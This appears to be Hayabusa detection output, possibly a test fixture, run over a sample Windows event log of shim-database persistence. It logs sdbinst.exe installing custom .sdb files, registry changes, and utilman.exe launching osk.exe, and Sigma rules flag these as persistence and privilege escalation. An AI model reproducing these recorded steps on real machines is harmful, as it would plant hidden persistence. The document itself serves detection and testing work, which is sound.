+2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.802 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.832 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.972 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:45.172 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 365ABB72-5638-5C91-0000-0010651A0800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.953 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:25.983 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.104 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 365ABB72-568A-5C91-0000-0010D24B0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.144 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.154 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:47.484 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 365ABB72-5765-5C91-0000-001039030900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.014 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2892 | PGUID: 365ABB72-57F4-5C91-0000-001083920900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3700 | PGUID: 365ABB72-57F4-5C91-0000-001070930900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2604 | PGUID: 365ABB72-57F4-5C91-0000-0010BB9C0900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:31.860 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-57F7-5C91-0000-001008B30900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
